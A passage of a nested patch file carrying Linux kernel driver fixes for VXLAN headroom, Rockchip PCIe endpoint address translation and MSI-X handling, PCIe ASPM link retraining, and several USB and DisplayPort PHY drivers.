+ 
+-	if (use_ipv6 || conf->flags & VXLAN_F_COLLECT_METADATA)
+-		needed_headroom += VXLAN6_HEADROOM;
+-	else
+-		needed_headroom += VXLAN_HEADROOM;
++	if (flags & VXLAN_F_COLLECT_METADATA)
++		flags |= VXLAN_F_IPV6;
++	needed_headroom += vxlan_headroom(flags);
+ 	dev->needed_headroom = needed_headroom;
+ 
+ 	memcpy(&vxlan->cfg, conf, sizeof(*conf));
+diff --git a/drivers/pci/controller/pcie-rockchip-ep.c b/drivers/pci/controller/pcie-rockchip-ep.c
+index 827d91e73efab..0af0e965fb57e 100644
+--- a/drivers/pci/controller/pcie-rockchip-ep.c
++++ b/drivers/pci/controller/pcie-rockchip-ep.c
+@@ -61,65 +61,32 @@ static void rockchip_pcie_clear_ep_ob_atu(struct rockchip_pcie *rockchip,
+ 			    ROCKCHIP_PCIE_AT_OB_REGION_DESC0(region));
+ 	rockchip_pcie_write(rockchip, 0,
+ 			    ROCKCHIP_PCIE_AT_OB_REGION_DESC1(region));
+-	rockchip_pcie_write(rockchip, 0,
+-			    ROCKCHIP_PCIE_AT_OB_REGION_CPU_ADDR0(region));
+-	rockchip_pcie_write(rockchip, 0,
+-			    ROCKCHIP_PCIE_AT_OB_REGION_CPU_ADDR1(region));
+ }
+ 
+ static void rockchip_pcie_prog_ep_ob_atu(struct rockchip_pcie *rockchip, u8 fn,
+-					 u32 r, u32 type, u64 cpu_addr,
+-					 u64 pci_addr, size_t size)
++					 u32 r, u64 cpu_addr, u64 pci_addr,
++					 size_t size)
+ {
+-	u64 sz = 1ULL << fls64(size - 1);
+-	int num_pass_bits = ilog2(sz);
+-	u32 addr0, addr1, desc0, desc1;
+-	bool is_nor_msg = (type == AXI_WRAPPER_NOR_MSG);
++	int num_pass_bits = fls64(size - 1);
++	u32 addr0, addr1, desc0;
+ 
+-	/* The minimal region size is 1MB */
+ 	if (num_pass_bits < 8)
+ 		num_pass_bits = 8;
+ 
+-	cpu_addr -= rockchip->mem_res->start;
+-	addr0 = ((is_nor_msg ? 0x10 : (num_pass_bits - 1)) &
+-		PCIE_CORE_OB_REGION_ADDR0_NUM_BITS) |
+-		(lower_32_bits(cpu_addr) & PCIE_CORE_OB_REGION_ADDR0_LO_ADDR);
+-	addr1 = upper_32_bits(is_nor_msg ? cpu_addr : pci_addr);
+-	desc0 = ROCKCHIP_PCIE_AT_OB_REGION_DESC0_DEVFN(fn) | type;
+-	desc1 = 0;
+-
+-	if (is_nor_msg) {
+-		rockchip_pcie_write(rockchip, 0,
+-				    ROCKCHIP_PCIE_AT_OB_REGION_PCI_ADDR0(r));
+-		rockchip_pcie_write(rockchip, 0,
+-				    ROCKCHIP_PCIE_AT_OB_REGION_PCI_ADDR1(r));
+-		rockchip_pcie_write(rockchip, desc0,
+-				    ROCKCHIP_PCIE_AT_OB_REGION_DESC0(r));
+-		rockchip_pcie_write(rockchip, desc1,
+-				    ROCKCHIP_PCIE_AT_OB_REGION_DESC1(r));
+-	} else {
+-		/* PCI bus address region */
+-		rockchip_pcie_write(rockchip, addr0,
+-				    ROCKCHIP_PCIE_AT_OB_REGION_PCI_ADDR0(r));
+-		rockchip_pcie_write(rockchip, addr1,
+-				    ROCKCHIP_PCIE_AT_OB_REGION_PCI_ADDR1(r));
+-		rockchip_pcie_write(rockchip, desc0,
+-				    ROCKCHIP_PCIE_AT_OB_REGION_DESC0(r));
+-		rockchip_pcie_write(rockchip, desc1,
+-				    ROCKCHIP_PCIE_AT_OB_REGION_DESC1(r));
+-
+-		addr0 =
+-		    ((num_pass_bits - 1) & PCIE_CORE_OB_REGION_ADDR0_NUM_BITS) |
+-		    (lower_32_bits(cpu_addr) &
+-		     PCIE_CORE_OB_REGION_ADDR0_LO_ADDR);
+-		addr1 = upper_32_bits(cpu_addr);
+-	}
++	addr0 = ((num_pass_bits - 1) & PCIE_CORE_OB_REGION_ADDR0_NUM_BITS) |
++		(lower_32_bits(pci_addr) & PCIE_CORE_OB_REGION_ADDR0_LO_ADDR);
++	addr1 = upper_32_bits(pci_addr);
++	desc0 = ROCKCHIP_PCIE_AT_OB_REGION_DESC0_DEVFN(fn) | AXI_WRAPPER_MEM_WRITE;
+ 
+-	/* CPU bus address region */
++	/* PCI bus address region */
+ 	rockchip_pcie_write(rockchip, addr0,
+-			    ROCKCHIP_PCIE_AT_OB_REGION_CPU_ADDR0(r));
++			    ROCKCHIP_PCIE_AT_OB_REGION_PCI_ADDR0(r));
+ 	rockchip_pcie_write(rockchip, addr1,
+-			    ROCKCHIP_PCIE_AT_OB_REGION_CPU_ADDR1(r));
++			    ROCKCHIP_PCIE_AT_OB_REGION_PCI_ADDR1(r));
++	rockchip_pcie_write(rockchip, desc0,
++			    ROCKCHIP_PCIE_AT_OB_REGION_DESC0(r));
++	rockchip_pcie_write(rockchip, 0,
++			    ROCKCHIP_PCIE_AT_OB_REGION_DESC1(r));
+ }
+ 
+ static int rockchip_pcie_ep_write_header(struct pci_epc *epc, u8 fn, u8 vfn,
+@@ -258,26 +225,20 @@ static void rockchip_pcie_ep_clear_bar(struct pci_epc *epc, u8 fn, u8 vfn,
+ 			    ROCKCHIP_PCIE_AT_IB_EP_FUNC_BAR_ADDR1(fn, bar));
+ }
+ 
++static inline u32 rockchip_ob_region(phys_addr_t addr)
++{
++	return (addr >> ilog2(SZ_1M)) & 0x1f;
++}
++
+ static int rockchip_pcie_ep_map_addr(struct pci_epc *epc, u8 fn, u8 vfn,
+ 				     phys_addr_t addr, u64 pci_addr,
+ 				     size_t size)
+ {
+ 	struct rockchip_pcie_ep *ep = epc_get_drvdata(epc);
+ 	struct rockchip_pcie *pcie = &ep->rockchip;
+-	u32 r;
+-
+-	r = find_first_zero_bit(&ep->ob_region_map, BITS_PER_LONG);
+-	/*
+-	 * Region 0 is reserved for configuration space and shouldn't
+-	 * be used elsewhere per TRM, so leave it out.
+-	 */
+-	if (r >= ep->max_regions - 1) {
+-		dev_err(&epc->dev, "no free outbound region\n");
+-		return -EINVAL;
+-	}
++	u32 r = rockchip_ob_region(addr);
+ 
+-	rockchip_pcie_prog_ep_ob_atu(pcie, fn, r, AXI_WRAPPER_MEM_WRITE, addr,
+-				     pci_addr, size);
++	rockchip_pcie_prog_ep_ob_atu(pcie, fn, r, addr, pci_addr, size);
+ 
+ 	set_bit(r, &ep->ob_region_map);
+ 	ep->ob_addr[r] = addr;
+@@ -292,15 +253,11 @@ static void rockchip_pcie_ep_unmap_addr(struct pci_epc *epc, u8 fn, u8 vfn,
+ 	struct rockchip_pcie *rockchip = &ep->rockchip;
+ 	u32 r;
+ 
+-	for (r = 0; r < ep->max_regions - 1; r++)
++	for (r = 0; r < ep->max_regions; r++)
+ 		if (ep->ob_addr[r] == addr)
+ 			break;
+ 
+-	/*
+-	 * Region 0 is reserved for configuration space and shouldn't
+-	 * be used elsewhere per TRM, so leave it out.
+-	 */
+-	if (r == ep->max_regions - 1)
++	if (r == ep->max_regions)
+ 		return;
+ 
+ 	rockchip_pcie_clear_ep_ob_atu(rockchip, r);
+@@ -397,7 +354,8 @@ static int rockchip_pcie_ep_send_msi_irq(struct rockchip_pcie_ep *ep, u8 fn,
+ 	struct rockchip_pcie *rockchip = &ep->rockchip;
+ 	u32 flags, mme, data, data_mask;
+ 	u8 msi_count;
+-	u64 pci_addr, pci_addr_mask = 0xff;
++	u64 pci_addr;
++	u32 r;
+ 
+ 	/* Check MSI enable bit */
+ 	flags = rockchip_pcie_read(&ep->rockchip,
+@@ -431,21 +389,20 @@ static int rockchip_pcie_ep_send_msi_irq(struct rockchip_pcie_ep *ep, u8 fn,
+ 				       ROCKCHIP_PCIE_EP_FUNC_BASE(fn) +
+ 				       ROCKCHIP_PCIE_EP_MSI_CTRL_REG +
+ 				       PCI_MSI_ADDRESS_LO);
+-	pci_addr &= GENMASK_ULL(63, 2);
+ 
+ 	/* Set the outbound region if needed. */
+-	if (unlikely(ep->irq_pci_addr != (pci_addr & ~pci_addr_mask) ||
++	if (unlikely(ep->irq_pci_addr != (pci_addr & PCIE_ADDR_MASK) ||
+ 		     ep->irq_pci_fn != fn)) {
+-		rockchip_pcie_prog_ep_ob_atu(rockchip, fn, ep->max_regions - 1,
+-					     AXI_WRAPPER_MEM_WRITE,
++		r = rockchip_ob_region(ep->irq_phys_addr);
++		rockchip_pcie_prog_ep_ob_atu(rockchip, fn, r,
+ 					     ep->irq_phys_addr,
+-					     pci_addr & ~pci_addr_mask,
+-					     pci_addr_mask + 1);
+-		ep->irq_pci_addr = (pci_addr & ~pci_addr_mask);
++					     pci_addr & PCIE_ADDR_MASK,
++					     ~PCIE_ADDR_MASK + 1);
++		ep->irq_pci_addr = (pci_addr & PCIE_ADDR_MASK);
+ 		ep->irq_pci_fn = fn;
+ 	}
+ 
+-	writew(data, ep->irq_cpu_addr + (pci_addr & pci_addr_mask));
++	writew(data, ep->irq_cpu_addr + (pci_addr & ~PCIE_ADDR_MASK));
+ 	return 0;
+ }
+ 
+@@ -527,6 +484,8 @@ static int rockchip_pcie_parse_ep_dt(struct rockchip_pcie *rockchip,
+ 	if (err < 0 || ep->max_regions > MAX_REGION_LIMIT)
+ 		ep->max_regions = MAX_REGION_LIMIT;
+ 
++	ep->ob_region_map = 0;
++
+ 	err = of_property_read_u8(dev->of_node, "max-functions",
+ 				  &ep->epc->max_functions);
+ 	if (err < 0)
+@@ -547,7 +506,9 @@ static int rockchip_pcie_ep_probe(struct platform_device *pdev)
+ 	struct rockchip_pcie *rockchip;
+ 	struct pci_epc *epc;
+ 	size_t max_regions;
+-	int err;
++	struct pci_epc_mem_window *windows = NULL;
++	int err, i;
++	u32 cfg_msi, cfg_msix_cp;
+ 
+ 	ep = devm_kzalloc(dev, sizeof(*ep), GFP_KERNEL);
+ 	if (!ep)
+@@ -594,15 +555,27 @@ static int rockchip_pcie_ep_probe(struct platform_device *pdev)
+ 	/* Only enable function 0 by default */
+ 	rockchip_pcie_write(rockchip, BIT(0), PCIE_CORE_PHY_FUNC_CFG);
+ 
+-	err = pci_epc_mem_init(epc, rockchip->mem_res->start,
+-			       resource_size(rockchip->mem_res), PAGE_SIZE);
++	windows = devm_kcalloc(dev, ep->max_regions,
++			       sizeof(struct pci_epc_mem_window), GFP_KERNEL);
++	if (!windows) {
++		err = -ENOMEM;
++		goto err_uninit_port;
++	}
++	for (i = 0; i < ep->max_regions; i++) {
++		windows[i].phys_base = rockchip->mem_res->start + (SZ_1M * i);
++		windows[i].size = SZ_1M;
++		windows[i].page_size = SZ_1M;
++	}
++	err = pci_epc_multi_mem_init(epc, windows, ep->max_regions);
++	devm_kfree(dev, windows);
++
+ 	if (err < 0) {
+ 		dev_err(dev, "failed to initialize the memory space\n");
+ 		goto err_uninit_port;
+ 	}
+ 
+ 	ep->irq_cpu_addr = pci_epc_mem_alloc_addr(epc, &ep->irq_phys_addr,
+-						  SZ_128K);
++						  SZ_1M);
+ 	if (!ep->irq_cpu_addr) {
+ 		dev_err(dev, "failed to reserve memory space for MSI\n");
+ 		err = -ENOMEM;
+@@ -611,6 +584,29 @@ static int rockchip_pcie_ep_probe(struct platform_device *pdev)
+ 
+ 	ep->irq_pci_addr = ROCKCHIP_PCIE_EP_DUMMY_IRQ_ADDR;
+ 
++	/*
++	 * MSI-X is not supported but the controller still advertises the MSI-X
++	 * capability by default, which can lead to the Root Complex side
++	 * allocating MSI-X vectors which cannot be used. Avoid this by skipping
++	 * the MSI-X capability entry in the PCIe capabilities linked-list: get
++	 * the next pointer from the MSI-X entry and set that in the MSI
++	 * capability entry (which is the previous entry). This way the MSI-X
++	 * entry is skipped (left out of the linked-list) and not advertised.
++	 */
++	cfg_msi = rockchip_pcie_read(rockchip, PCIE_EP_CONFIG_BASE +
++				     ROCKCHIP_PCIE_EP_MSI_CTRL_REG);
++
++	cfg_msi &= ~ROCKCHIP_PCIE_EP_MSI_CP1_MASK;
++
++	cfg_msix_cp = rockchip_pcie_read(rockchip, PCIE_EP_CONFIG_BASE +
++					 ROCKCHIP_PCIE_EP_MSIX_CAP_REG) &
++					 ROCKCHIP_PCIE_EP_MSIX_CAP_CP_MASK;
++
++	cfg_msi |= cfg_msix_cp;
++
++	rockchip_pcie_write(rockchip, cfg_msi,
++			    PCIE_EP_CONFIG_BASE + ROCKCHIP_PCIE_EP_MSI_CTRL_REG);
++
+ 	rockchip_pcie_write(rockchip, PCIE_CLIENT_CONF_ENABLE,
+ 			    PCIE_CLIENT_CONFIG);
+ 
+diff --git a/drivers/pci/controller/pcie-rockchip.h b/drivers/pci/controller/pcie-rockchip.h
+index 8e92dc3339ecc..fe0333778fd93 100644
+--- a/drivers/pci/controller/pcie-rockchip.h
++++ b/drivers/pci/controller/pcie-rockchip.h
+@@ -139,6 +139,7 @@
+ 
+ #define PCIE_RC_RP_ATS_BASE		0x400000
+ #define PCIE_RC_CONFIG_NORMAL_BASE	0x800000
++#define PCIE_EP_PF_CONFIG_REGS_BASE	0x800000
+ #define PCIE_RC_CONFIG_BASE		0xa00000
+ #define PCIE_EP_CONFIG_BASE		0xa00000
+ #define PCIE_EP_CONFIG_DID_VID		(PCIE_EP_CONFIG_BASE + 0x00)
+@@ -157,10 +158,11 @@
+ #define PCIE_RC_CONFIG_THP_CAP		(PCIE_RC_CONFIG_BASE + 0x274)
+ #define   PCIE_RC_CONFIG_THP_CAP_NEXT_MASK	GENMASK(31, 20)
+ 
++#define PCIE_ADDR_MASK			0xffffff00
+ #define PCIE_CORE_AXI_CONF_BASE		0xc00000
+ #define PCIE_CORE_OB_REGION_ADDR0	(PCIE_CORE_AXI_CONF_BASE + 0x0)
+ #define   PCIE_CORE_OB_REGION_ADDR0_NUM_BITS	0x3f
+-#define   PCIE_CORE_OB_REGION_ADDR0_LO_ADDR	0xffffff00
++#define   PCIE_CORE_OB_REGION_ADDR0_LO_ADDR	PCIE_ADDR_MASK
+ #define PCIE_CORE_OB_REGION_ADDR1	(PCIE_CORE_AXI_CONF_BASE + 0x4)
+ #define PCIE_CORE_OB_REGION_DESC0	(PCIE_CORE_AXI_CONF_BASE + 0x8)
+ #define PCIE_CORE_OB_REGION_DESC1	(PCIE_CORE_AXI_CONF_BASE + 0xc)
+@@ -168,7 +170,7 @@
+ #define PCIE_CORE_AXI_INBOUND_BASE	0xc00800
+ #define PCIE_RP_IB_ADDR0		(PCIE_CORE_AXI_INBOUND_BASE + 0x0)
+ #define   PCIE_CORE_IB_REGION_ADDR0_NUM_BITS	0x3f
+-#define   PCIE_CORE_IB_REGION_ADDR0_LO_ADDR	0xffffff00
++#define   PCIE_CORE_IB_REGION_ADDR0_LO_ADDR	PCIE_ADDR_MASK
+ #define PCIE_RP_IB_ADDR1		(PCIE_CORE_AXI_INBOUND_BASE + 0x4)
+ 
+ /* Size of one AXI Region (not Region 0) */
+@@ -225,6 +227,8 @@
+ #define ROCKCHIP_PCIE_EP_CMD_STATUS			0x4
+ #define   ROCKCHIP_PCIE_EP_CMD_STATUS_IS		BIT(19)
+ #define ROCKCHIP_PCIE_EP_MSI_CTRL_REG			0x90
++#define   ROCKCHIP_PCIE_EP_MSI_CP1_OFFSET		8
++#define   ROCKCHIP_PCIE_EP_MSI_CP1_MASK			GENMASK(15, 8)
+ #define   ROCKCHIP_PCIE_EP_MSI_FLAGS_OFFSET		16
+ #define   ROCKCHIP_PCIE_EP_MSI_CTRL_MMC_OFFSET		17
+ #define   ROCKCHIP_PCIE_EP_MSI_CTRL_MMC_MASK		GENMASK(19, 17)
+@@ -232,14 +236,19 @@
+ #define   ROCKCHIP_PCIE_EP_MSI_CTRL_MME_MASK		GENMASK(22, 20)
+ #define   ROCKCHIP_PCIE_EP_MSI_CTRL_ME				BIT(16)
+ #define   ROCKCHIP_PCIE_EP_MSI_CTRL_MASK_MSI_CAP	BIT(24)
++#define ROCKCHIP_PCIE_EP_MSIX_CAP_REG			0xb0
++#define   ROCKCHIP_PCIE_EP_MSIX_CAP_CP_OFFSET		8
++#define   ROCKCHIP_PCIE_EP_MSIX_CAP_CP_MASK		GENMASK(15, 8)
+ #define ROCKCHIP_PCIE_EP_DUMMY_IRQ_ADDR				0x1
+-#define ROCKCHIP_PCIE_EP_FUNC_BASE(fn)	(((fn) << 12) & GENMASK(19, 12))
++#define ROCKCHIP_PCIE_EP_PCI_LEGACY_IRQ_ADDR		0x3
++#define ROCKCHIP_PCIE_EP_FUNC_BASE(fn) \
++	(PCIE_EP_PF_CONFIG_REGS_BASE + (((fn) << 12) & GENMASK(19, 12)))
++#define ROCKCHIP_PCIE_EP_VIRT_FUNC_BASE(fn) \
++	(PCIE_EP_PF_CONFIG_REGS_BASE + 0x10000 + (((fn) << 12) & GENMASK(19, 12)))
+ #define ROCKCHIP_PCIE_AT_IB_EP_FUNC_BAR_ADDR0(fn, bar) \
+-	(PCIE_RC_RP_ATS_BASE + 0x0840 + (fn) * 0x0040 + (bar) * 0x0008)
++	(PCIE_CORE_AXI_CONF_BASE + 0x0828 + (fn) * 0x0040 + (bar) * 0x0008)
+ #define ROCKCHIP_PCIE_AT_IB_EP_FUNC_BAR_ADDR1(fn, bar) \
+-	(PCIE_RC_RP_ATS_BASE + 0x0844 + (fn) * 0x0040 + (bar) * 0x0008)
+-#define ROCKCHIP_PCIE_AT_OB_REGION_PCI_ADDR0(r) \
+-	(PCIE_RC_RP_ATS_BASE + 0x0000 + ((r) & 0x1f) * 0x0020)
++	(PCIE_CORE_AXI_CONF_BASE + 0x082c + (fn) * 0x0040 + (bar) * 0x0008)
+ #define ROCKCHIP_PCIE_AT_OB_REGION_PCI_ADDR0_DEVFN_MASK	GENMASK(19, 12)
+ #define ROCKCHIP_PCIE_AT_OB_REGION_PCI_ADDR0_DEVFN(devfn) \
+ 	(((devfn) << 12) & \
+@@ -247,20 +256,21 @@
+ #define ROCKCHIP_PCIE_AT_OB_REGION_PCI_ADDR0_BUS_MASK	GENMASK(27, 20)
+ #define ROCKCHIP_PCIE_AT_OB_REGION_PCI_ADDR0_BUS(bus) \
+ 		(((bus) << 20) & ROCKCHIP_PCIE_AT_OB_REGION_PCI_ADDR0_BUS_MASK)
++#define PCIE_RC_EP_ATR_OB_REGIONS_1_32 (PCIE_CORE_AXI_CONF_BASE + 0x0020)
++#define ROCKCHIP_PCIE_AT_OB_REGION_PCI_ADDR0(r) \
++		(PCIE_RC_EP_ATR_OB_REGIONS_1_32 + 0x0000 + ((r) & 0x1f) * 0x0020)
+ #define ROCKCHIP_PCIE_AT_OB_REGION_PCI_ADDR1(r) \
+-		(PCIE_RC_RP_ATS_BASE + 0x0004 + ((r) & 0x1f) * 0x0020)
++		(PCIE_RC_EP_ATR_OB_REGIONS_1_32 + 0x0004 + ((r) & 0x1f) * 0x0020)
+ #define ROCKCHIP_PCIE_AT_OB_REGION_DESC0_HARDCODED_RID	BIT(23)
+ #define ROCKCHIP_PCIE_AT_OB_REGION_DESC0_DEVFN_MASK	GENMASK(31, 24)
+ #define ROCKCHIP_PCIE_AT_OB_REGION_DESC0_DEVFN(devfn) \
+ 		(((devfn) << 24) & ROCKCHIP_PCIE_AT_OB_REGION_DESC0_DEVFN_MASK)
+ #define ROCKCHIP_PCIE_AT_OB_REGION_DESC0(r) \
+-		(PCIE_RC_RP_ATS_BASE + 0x0008 + ((r) & 0x1f) * 0x0020)
+-#define ROCKCHIP_PCIE_AT_OB_REGION_DESC1(r)	\
+-		(PCIE_RC_RP_ATS_BASE + 0x000c + ((r) & 0x1f) * 0x0020)
+-#define ROCKCHIP_PCIE_AT_OB_REGION_CPU_ADDR0(r) \
+-		(PCIE_RC_RP_ATS_BASE + 0x0018 + ((r) & 0x1f) * 0x0020)
+-#define ROCKCHIP_PCIE_AT_OB_REGION_CPU_ADDR1(r) \
+-		(PCIE_RC_RP_ATS_BASE + 0x001c + ((r) & 0x1f) * 0x0020)
++		(PCIE_RC_EP_ATR_OB_REGIONS_1_32 + 0x0008 + ((r) & 0x1f) * 0x0020)
++#define ROCKCHIP_PCIE_AT_OB_REGION_DESC1(r) \
++		(PCIE_RC_EP_ATR_OB_REGIONS_1_32 + 0x000c + ((r) & 0x1f) * 0x0020)
++#define ROCKCHIP_PCIE_AT_OB_REGION_DESC2(r) \
++		(PCIE_RC_EP_ATR_OB_REGIONS_1_32 + 0x0010 + ((r) & 0x1f) * 0x0020)
+ 
+ #define ROCKCHIP_PCIE_CORE_EP_FUNC_BAR_CFG0(fn) \
+ 		(PCIE_CORE_CTRL_MGMT_BASE + 0x0240 + (fn) * 0x0008)
+diff --git a/drivers/pci/pcie/aspm.c b/drivers/pci/pcie/aspm.c
+index 74b8183c305df..07166a4ec27ad 100644
+--- a/drivers/pci/pcie/aspm.c
++++ b/drivers/pci/pcie/aspm.c
+@@ -193,12 +193,39 @@ static void pcie_clkpm_cap_init(struct pcie_link_state *link, int blacklist)
+ 	link->clkpm_disable = blacklist ? 1 : 0;
+ }
+ 
+-static bool pcie_retrain_link(struct pcie_link_state *link)
++static int pcie_wait_for_retrain(struct pci_dev *pdev)
+ {
+-	struct pci_dev *parent = link->pdev;
+ 	unsigned long end_jiffies;
+ 	u16 reg16;
+ 
++	/* Wait for Link Training to be cleared by hardware */
++	end_jiffies = jiffies + LINK_RETRAIN_TIMEOUT;
++	do {
++		pcie_capability_read_word(pdev, PCI_EXP_LNKSTA, &reg16);
++		if (!(reg16 & PCI_EXP_LNKSTA_LT))
++			return 0;
++		msleep(1);
++	} while (time_before(jiffies, end_jiffies));
++
++	return -ETIMEDOUT;
++}
++
++static int pcie_retrain_link(struct pcie_link_state *link)
++{
++	struct pci_dev *parent = link->pdev;
++	int rc;
++	u16 reg16;
++
++	/*
++	 * Ensure the updated LNKCTL parameters are used during link
++	 * training by checking that there is no ongoing link training to
++	 * avoid LTSSM race as recommended in Implementation Note at the
++	 * end of PCIe r6.0.1 sec 7.5.3.7.
++	 */
++	rc = pcie_wait_for_retrain(parent);
++	if (rc)
++		return rc;
++
+ 	pcie_capability_read_word(parent, PCI_EXP_LNKCTL, &reg16);
+ 	reg16 |= PCI_EXP_LNKCTL_RL;
+ 	pcie_capability_write_word(parent, PCI_EXP_LNKCTL, reg16);
+@@ -212,15 +239,7 @@ static bool pcie_retrain_link(struct pcie_link_state *link)
+ 		pcie_capability_write_word(parent, PCI_EXP_LNKCTL, reg16);
+ 	}
+ 
+-	/* Wait for link training end. Break out after waiting for timeout */
+-	end_jiffies = jiffies + LINK_RETRAIN_TIMEOUT;
+-	do {
+-		pcie_capability_read_word(parent, PCI_EXP_LNKSTA, &reg16);
+-		if (!(reg16 & PCI_EXP_LNKSTA_LT))
+-			break;
+-		msleep(1);
+-	} while (time_before(jiffies, end_jiffies));
+-	return !(reg16 & PCI_EXP_LNKSTA_LT);
++	return pcie_wait_for_retrain(parent);
+ }
+ 
+ /*
+@@ -289,15 +308,15 @@ static void pcie_aspm_configure_common_clock(struct pcie_link_state *link)
+ 		reg16 &= ~PCI_EXP_LNKCTL_CCC;
+ 	pcie_capability_write_word(parent, PCI_EXP_LNKCTL, reg16);
+ 
+-	if (pcie_retrain_link(link))
+-		return;
++	if (pcie_retrain_link(link)) {
+ 
+-	/* Training failed. Restore common clock configurations */
+-	pci_err(parent, "ASPM: Could not configure common clock\n");
+-	list_for_each_entry(child, &linkbus->devices, bus_list)
+-		pcie_capability_write_word(child, PCI_EXP_LNKCTL,
++		/* Training failed. Restore common clock configurations */
++		pci_err(parent, "ASPM: Could not configure common clock\n");
++		list_for_each_entry(child, &linkbus->devices, bus_list)
++			pcie_capability_write_word(child, PCI_EXP_LNKCTL,
+ 					   child_reg[PCI_FUNC(child->devfn)]);
+-	pcie_capability_write_word(parent, PCI_EXP_LNKCTL, parent_reg);
++		pcie_capability_write_word(parent, PCI_EXP_LNKCTL, parent_reg);
++	}
+ }
+ 
+ /* Convert L0s latency encoding to ns */
+diff --git a/drivers/phy/hisilicon/phy-hisi-inno-usb2.c b/drivers/phy/hisilicon/phy-hisi-inno-usb2.c
+index b133ae06757ab..a922fb11a1092 100644
+--- a/drivers/phy/hisilicon/phy-hisi-inno-usb2.c
++++ b/drivers/phy/hisilicon/phy-hisi-inno-usb2.c
+@@ -158,7 +158,7 @@ static int hisi_inno_phy_probe(struct platform_device *pdev)
+ 		phy_set_drvdata(phy, &priv->ports[i]);
+ 		i++;
+ 
+-		if (i > INNO_PHY_PORT_NUM) {
++		if (i >= INNO_PHY_PORT_NUM) {
+ 			dev_warn(dev, "Support %d ports in maximum\n", i);
+ 			of_node_put(child);
+ 			break;
+diff --git a/drivers/phy/mediatek/phy-mtk-dp.c b/drivers/phy/mediatek/phy-mtk-dp.c
+index 232fd3f1ff1b1..d7024a1443358 100644
+--- a/drivers/phy/mediatek/phy-mtk-dp.c
++++ b/drivers/phy/mediatek/phy-mtk-dp.c
+@@ -169,7 +169,7 @@ static int mtk_dp_phy_probe(struct platform_device *pdev)
+ 
+ 	regs = *(struct regmap **)dev->platform_data;
+ 	if (!regs)
+-		return dev_err_probe(dev, EINVAL,
++		return dev_err_probe(dev, -EINVAL,
+ 				     "No data passed, requires struct regmap**\n");
+ 
+ 	dp_phy = devm_kzalloc(dev, sizeof(*dp_phy), GFP_KERNEL);
+diff --git a/drivers/phy/qualcomm/phy-qcom-snps-femto-v2.c b/drivers/phy/qualcomm/phy-qcom-snps-femto-v2.c
+index a590635962140..6170f8fd118e2 100644
+--- a/drivers/phy/qualcomm/phy-qcom-snps-femto-v2.c
++++ b/drivers/phy/qualcomm/phy-qcom-snps-femto-v2.c
+@@ -110,23 +110,27 @@ struct phy_override_seq {
+ /**
+  * struct qcom_snps_hsphy - snps hs phy attributes
+  *
++ * @dev: device structure
++ *
+  * @phy: generic phy
+  * @base: iomapped memory space for snps hs phy
+  *
+- * @cfg_ahb_clk: AHB2PHY interface clock
+- * @ref_clk: phy reference clock
+- * @iface_clk: phy interface clock
++ * @num_clks: number of clocks
++ * @clks: array of clocks
+  * @phy_reset: phy reset control
+  * @vregs: regulator supplies bulk data
+  * @phy_initialized: if PHY has been initialized correctly
+  * @mode: contains the current mode the PHY is in
++ * @update_seq_cfg: tuning parameters for phy init
+  */
+ struct qcom_snps_hsphy {
++	struct device *dev;
++
+ 	struct phy *phy;
+ 	void __iomem *base;
+ 
+-	struct clk *cfg_ahb_clk;
+-	struct clk *ref_clk;
++	int num_clks;
++	struct clk_bulk_data *clks;
+ 	struct reset_control *phy_reset;
+ 	struct regulator_bulk_data vregs[SNPS_HS_NUM_VREGS];
+ 
+@@ -135,6 +139,34 @@ struct qcom_snps_hsphy {
+ 	struct phy_override_seq update_seq_cfg[NUM_HSPHY_TUNING_PARAMS];
+ };
+ 
++static int qcom_snps_hsphy_clk_init(struct qcom_snps_hsphy *hsphy)
++{
++	struct device *dev = hsphy->dev;
++
++	hsphy->num_clks = 2;
++	hsphy->clks = devm_kcalloc(dev, hsphy->num_clks, sizeof(*hsphy->clks), GFP_KERNEL);
++	if (!hsphy->clks)
++		return -ENOMEM;
++
++	/*
++	 * TODO: Currently no device tree instantiation of the PHY is using the clock.
++	 * This needs to be fixed in order for this code to be able to use devm_clk_bulk_get().
++	 */
++	hsphy->clks[0].id = "cfg_ahb";
++	hsphy->clks[0].clk = devm_clk_get_optional(dev, "cfg_ahb");
++	if (IS_ERR(hsphy->clks[0].clk))
++		return dev_err_probe(dev, PTR_ERR(hsphy->clks[0].clk),
++				     "failed to get cfg_ahb clk\n");
++
++	hsphy->clks[1].id = "ref";
++	hsphy->clks[1].clk = devm_clk_get(dev, "ref");
++	if (IS_ERR(hsphy->clks[1].clk))
++		return dev_err_probe(dev, PTR_ERR(hsphy->clks[1].clk),
++				     "failed to get ref clk\n");
++
++	return 0;
++}
++
+ static inline void qcom_snps_hsphy_write_mask(void __iomem *base, u32 offset,
+ 						u32 mask, u32 val)
+ {
+@@ -165,22 +197,13 @@ static int qcom_snps_hsphy_suspend(struct qcom_snps_hsphy *hsphy)
+ 					   0, USB2_AUTO_RESUME);
+ 	}
+ 
+-	clk_disable_unprepare(hsphy->cfg_ahb_clk);
+ 	return 0;
+ }
+ 
+ static int qcom_snps_hsphy_resume(struct qcom_snps_hsphy *hsphy)
+ {
+-	int ret;
+-
+ 	dev_dbg(&hsphy->phy->dev, "Resume QCOM SNPS PHY, mode\n");
+ 
+-	ret = clk_prepare_enable(hsphy->cfg_ahb_clk);
+-	if (ret) {
+-		dev_err(&hsphy->phy->dev, "failed to enable cfg ahb clock\n");
+-		return ret;
+-	}
+-
+ 	return 0;
+ }
+ 
+@@ -374,16 +397,16 @@ static int qcom_snps_hsphy_init(struct phy *phy)
+ 	if (ret)
+ 		return ret;
+ 
+-	ret = clk_prepare_enable(hsphy->cfg_ahb_clk);
++	ret = clk_bulk_prepare_enable(hsphy->num_clks, hsphy->clks);
+ 	if (ret) {
+-		dev_err(&phy->dev, "failed to enable cfg ahb clock, %d\n", ret);
++		dev_err(&phy->dev, "failed to enable clocks, %d\n", ret);
+ 		goto poweroff_phy;
+ 	}
+ 
+ 	ret = reset_control_assert(hsphy->phy_reset);
+ 	if (ret) {
+ 		dev_err(&phy->dev, "failed to assert phy_reset, %d\n", ret);
+-		goto disable_ahb_clk;
++		goto disable_clks;
+ 	}
+ 
+ 	usleep_range(100, 150);
+@@ -391,7 +414,7 @@ static int qcom_snps_hsphy_init(struct phy *phy)
+ 	ret = reset_control_deassert(hsphy->phy_reset);
+ 	if (ret) {
+ 		dev_err(&phy->dev, "failed to de-assert phy_reset, %d\n", ret);
+-		goto disable_ahb_clk;
++		goto disable_clks;
+ 	}
+ 
+ 	qcom_snps_hsphy_write_mask(hsphy->base, USB2_PHY_USB_PHY_CFG0,
+@@ -448,8 +471,8 @@ static int qcom_snps_hsphy_init(struct phy *phy)
+ 
